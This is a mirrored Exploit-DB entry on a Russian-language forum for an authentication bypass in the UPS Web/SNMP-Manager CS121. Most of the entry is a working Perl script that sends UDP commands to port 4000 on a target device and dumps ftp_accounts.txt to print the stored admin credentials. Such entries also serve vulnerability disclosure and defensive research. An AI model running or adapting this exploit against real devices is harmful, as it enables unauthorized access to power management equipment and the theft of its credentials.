- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39186
- Проверка EDB
-
- Пройдено
- Автор
- JKMAC
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- null
- Дата публикации
- 2014-05-15
UPS Web/SNMP-Manager CS121 - Authentication Bypass
Код:
source: https://www.securityfocus.com/bid/67438/info
UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.
Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service.
#!/usr/bin/perl -w
use IO::Socket;
use constant MAXBYTES => scalar 1024;
$socket = IO::Socket::INET->new( PeerPort => 4000,
PeerAddr => $ARGV[0],
Type => SOCK_DGRAM,
Proto => 'udp');
$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n";
$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";
print "Searching login\n" ;
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt");
while($socket->recv($inline, MAXBYTES)) {
if($inline =~ /admin/ig) { print $inline; exit; }
}
sleep(1);- Источник
- www.exploit-db.com
